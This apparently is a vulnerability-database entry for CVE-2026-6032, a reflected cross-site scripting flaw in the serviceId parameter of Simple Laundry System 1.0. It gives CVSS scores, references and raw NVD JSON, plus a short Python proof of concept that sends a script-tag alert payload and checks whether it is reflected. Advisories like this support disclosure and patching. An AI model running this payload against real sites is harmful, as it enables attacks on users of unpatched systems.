CVE-2026-6032

Description

A vulnerability was found in code-projects Simple Laundry System 1.0. This impacts an unknown function of the file /checkcheckout.php. Performing a manipulation of the argument serviceId results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

code-projects Simple Laundry System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-6032
# Target: Simple Laundry System 1.0
# Vulnerable File: /checkcheckout.php
# Vulnerable Parameter: serviceId

import requests

def check_xss(target_url):
    # The payload attempts to execute a simple JavaScript alert
    xss_payload = "<script>alert('CVE-2026-6032_PoC')</script>"
    
    # Construct the malicious URL
    params = {
        "serviceId": xss_payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=5)
        
        # Check if the payload is reflected un-sanitized in the response
        if xss_payload in response.text:
            print(f"[+] Vulnerability confirmed at {target_url}")
            print(f"[+] Payload reflected in response.")
        else:
            print("[-] Vulnerability not detected or payload sanitized.")
            
    except requests.exceptions.RequestException as e:
        print(f"Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://target-host.com/checkcheckout.php" # Replace with actual target
    check_xss(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6032
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6032
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6032/
[4] VulDB https://vuldb.com/cve/CVE-2026-6032
[5] https://code-projects.org/
[6] https://github.com/GeekShuo/None/issues/1
[7] https://vuldb.com/submit/795487
[8] https://vuldb.com/vuln/356608
[9] https://vuldb.com/vuln/356608/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6032", "sourceIdentifier": "[email protected]", "published": "2026-04-10T08:16:26.473", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Simple Laundry System 1.0. This impacts an unknown function of the file /checkcheckout.php. Performing a manipulation of the argument serviceId results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]"}, {"url": "https://github.com/GeekShuo/None/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/795487", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/356608", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/356608/cti", "source": "[email protected]"}]}}